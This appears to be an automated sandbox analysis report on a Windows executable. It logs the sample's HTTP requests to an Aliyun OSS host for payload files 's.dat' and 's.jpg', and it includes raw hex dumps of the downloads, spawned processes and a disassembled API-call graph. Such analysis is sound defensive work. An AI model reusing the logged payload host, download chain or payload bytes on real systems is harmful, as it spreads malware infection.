                        2025-01-05 09:05:36 UTC4096INData Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af
                        Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                        2025-01-05 09:05:36 UTC4096INData Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f
                        Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
                        2025-01-05 09:05:36 UTC4096INData Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96
                        Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.74997339.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:44 UTC111OUTGET /s.dat HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:44 UTC561INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:44 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 28272
                        Connection: close
                        x-oss-request-id: 677A4B688797BE393803E539
                        Accept-Ranges: bytes
                        ETag: "58FF4EFABA7301817BE7A2CED40CB7A7"
                        Last-Modified: Sun, 05 Jan 2025 09:05:31 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 10779723525775050814
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000113
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: WP9O+rpzAYF756LO1Ay3pw==
                        x-oss-server-time: 17
                        2025-01-05 09:05:44 UTC3535INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                        Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                        2025-01-05 09:05:44 UTC4096INData Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92
                        Data Ascii: #_##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                        2025-01-05 09:05:44 UTC4096INData Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6
                        Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                        2025-01-05 09:05:44 UTC4096INData Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f
                        Data Ascii: 80JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKS
                        2025-01-05 09:05:44 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                        Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                        2025-01-05 09:05:44 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                        Data Ascii: ,$LDld=5}u]U
                        2025-01-05 09:05:44 UTC4096INData Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed
                        Data Ascii: gG<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                        2025-01-05 09:05:44 UTC161INData Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 34 47 8d 2e
                        Data Ascii: 'VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS4G.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.74997439.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:45 UTC111OUTGET /s.jpg HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:46 UTC544INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:46 GMT
                        Content-Type: image/jpeg
                        Content-Length: 8299
                        Connection: close
                        x-oss-request-id: 677A4B6A77F3A9393151F5E4
                        Accept-Ranges: bytes
                        ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                        Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 692387538176721524
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000104
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                        x-oss-server-time: 23
                        2025-01-05 09:05:46 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                        Data Ascii: JFIFZExifMM*JQQ%Q%CC
                        2025-01-05 09:05:46 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                        Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                        2025-01-05 09:05:46 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                        Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:04:04:02
                        Start date:05/01/2025
                        Path:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
                        Imagebase:0x140000000
                        File size:30'883'840 bytes
                        MD5 hash:934C8C307939CD29F7D1D434F1AD09EF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:05:30:14
                        Start date:05/01/2025
                        Path:C:\Users\user\Documents\vtxXmC.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Documents\vtxXmC.exe
                        Imagebase:0x140000000
                        File size:133'136 bytes
                        MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:13
                        Start time:05:30:15
                        Start date:05/01/2025
                        Path:C:\Users\user\Documents\vtxXmC.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Documents\vtxXmC.exe
                        Imagebase:0x140000000
                        File size:133'136 bytes
                        MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:32%
                          Total number of Nodes:462
                          Total number of Limit Nodes:7
                          execution_graph 13965 140005df3 13966 140005e71 13965->13966 13967 140005e84 CreateFileA 13966->13967 13968 140005f50 _SetThrowImageBase 13967->13968 13969 140005fc3 malloc ReadFile 13968->13969 15138 140007412 15141 140007333 15138->15141 15139 140007403 15140 1400073e0 LdrLoadDll 15140->15141 15141->15139 15141->15140 15537 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15540 1400054e0 15537->15540 15539 1400136ef 15541 14000552c 15540->15541 15544 140005506 sprintf_s 15540->15544 15542 1400074d0 LdrLoadDll 15541->15542 15543 140005536 15542->15543 15545 140008370 3 API calls 15543->15545 15544->15539 15549 140005545 _SetThrowImageBase 15545->15549 15546 1400055b8 15547 140008de0 _lock 2 API calls 15546->15547 15548 1400055c0 sprintf_s 15547->15548 15548->15544 15549->15546 15550 1400074f0 LdrLoadDll 15549->15550 15551 140005561 CreateThread 15550->15551 15551->15548 15552 1400055b0 GetLastError 15551->15552 15552->15546 13974 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13975 140005ab1 13974->13975 13976 140005add GetVersionExA 13974->13976 13977 140005abf 13975->13977 14024 140009540 13975->14024 13978 140005b0e GetProcessHeap HeapFree 13976->13978 13979 140005af0 GetProcessHeap HeapFree 13976->13979 14032 140009300 13977->14032 13984 140005b3c 13978->13984 13982 140005d0b 13979->13982 13983 140005ac9 14043 140008510 GetModuleHandleA 13983->14043 14047 14000a310 HeapCreate 13984->14047 13987 140005ad3 13987->13982 13988 140005bec 13989 140005c12 13988->13989 13990 140005bf0 13988->13990 13992 140005c17 13989->13992 13991 140005bfe 13990->13991 13993 140009540 _lock 12 API calls 13990->13993 13994 140009300 _lock 10 API calls 13991->13994 13995 140005c3d 13992->13995 13997 140005c29 13992->13997 13999 140009540 _lock 12 API calls 13992->13999 13993->13991 13996 140005c08 13994->13996 14050 140009f50 GetStartupInfoA 13995->14050 13998 140008510 _lock 3 API calls 13996->13998 14000 140009300 _lock 10 API calls 13997->14000 13998->13989 13999->13997 14001 140005c33 14000->14001 14003 140008510 _lock 3 API calls 14001->14003 14003->13995 14005 140005c56 14070 140009e30 14005->14070 14008 140005c5b 14088 140009c30 14008->14088 14012 140005c73 14013 140005c81 14012->14013 14014 1400084e0 _lock 12 API calls 14012->14014 14118 140009690 14013->14118 14014->14013 14016 140005c86 14017 140005c94 14016->14017 14018 1400084e0 _lock 12 API calls 14016->14018 14130 140008650 14017->14130 14018->14017 14020 140005c9e 14021 1400084e0 _lock 12 API calls 14020->14021 14022 140005ca9 14020->14022 14021->14022 14134 140001520 14022->14134 14025 14000954e _lock 14024->14025 14026 14000959c 14025->14026 14028 14000961c 14025->14028 14029 1400095c9 GetStdHandle 14025->14029 14027 140009300 _lock 10 API calls 14026->14027 14027->14028 14028->13977 14029->14026 14030 1400095dc 14029->14030 14030->14026 14031 1400095e2 WriteFile 14030->14031 14031->14026 14035 140009320 _lock 14032->14035 14033 140009330 14033->13983 14034 1400094dc GetStdHandle 14034->14033 14036 1400094ef 14034->14036 14035->14033 14035->14034 14038 140009375 _lock 14035->14038 14036->14033 14037 1400094f5 WriteFile 14036->14037 14037->14033 14038->14033 14039 1400093b9 GetModuleFileNameA 14038->14039 14040 1400093d9 _lock 14039->14040 14152 14000f000 14040->14152 14044 140008543 ExitProcess 14043->14044 14045 14000852a GetProcAddress 14043->14045 14045->14044 14046 14000853f 14045->14046 14046->14044 14048 14000a334 14047->14048 14049 14000a339 HeapSetInformation 14047->14049 14048->13988 14049->13988 14178 140008370 14050->14178 14052 140005c48 14052->14005 14063 1400084e0 14052->14063 14053 14000a1c4 GetStdHandle 14060 14000a17c 14053->14060 14054 140008370 3 API calls 14057 140009f8a 14054->14057 14055 14000a239 SetHandleCount 14055->14052 14056 14000a1d8 GetFileType 14056->14060 14057->14052 14057->14054 14058 14000a0e3 14057->14058 14057->14060 14058->14052 14059 14000a11c GetFileType 14058->14059 14058->14060 14183 14000edc0 14058->14183 14059->14058 14060->14052 14060->14053 14060->14055 14060->14056 14062 14000edc0 _lock 3 API calls 14060->14062 14062->14060 14064 140009540 _lock 12 API calls 14063->14064 14065 1400084ed 14064->14065 14066 140009300 _lock 10 API calls 14065->14066 14067 1400084f4 14066->14067 14068 1400073e0 _lock LdrLoadDll 14067->14068 14069 140008500 14068->14069 14071 140009e7c 14070->14071 14072 140009e3e GetCommandLineW 14070->14072 14075 140009e81 GetCommandLineW 14071->14075 14076 140009e69 14071->14076 14073 140009e49 GetCommandLineW 14072->14073 14074 140009e5e GetLastError 14072->14074 14073->14074 14074->14076 14077 140009e75 14074->14077 14075->14076 14076->14077 14078 140009e91 GetCommandLineA MultiByteToWideChar 14076->14078 14077->14008 14079 140009ec8 14078->14079 14080 140009ed9 14078->14080 14079->14008 14081 140008370 3 API calls 14080->14081 14082 140009eeb 14081->14082 14083 140009f32 14082->14083 14084 140009ef3 MultiByteToWideChar 14082->14084 14083->14008 14085 140009f13 14084->14085 14086 140009f2a 14084->14086 14085->14008 14197 140008de0 14086->14197 14089 140009c52 GetEnvironmentStringsW 14088->14089 14092 140009c86 14088->14092 14090 140009c6c GetLastError 14089->14090 14097 140009c60 14089->14097 14090->14092 14093 140009c77 14090->14093 14091 140009c91 GetEnvironmentStringsW 14095 140005c67 14091->14095 14091->14097 14092->14091 14092->14093 14094 140009d09 GetEnvironmentStrings 14093->14094 14093->14095 14094->14095 14096 140009d17 14094->14096 14114 1400099c0 GetModuleFileNameW 14095->14114 14099 140009d58 14096->14099 14101 140009d20 MultiByteToWideChar 14096->14101 14097->14097 14202 140008300 14097->14202 14102 140008370 3 API calls 14099->14102 14101->14095 14101->14096 14103 140009d68 14102->14103 14106 140009d7d 14103->14106 14107 140009d70 FreeEnvironmentStringsA 14103->14107 14104 140009ce1 __SehTransFilter 14109 140009cef FreeEnvironmentStringsW 14104->14109 14105 140009cd1 FreeEnvironmentStringsW 14105->14095 14108 140009de5 FreeEnvironmentStringsA 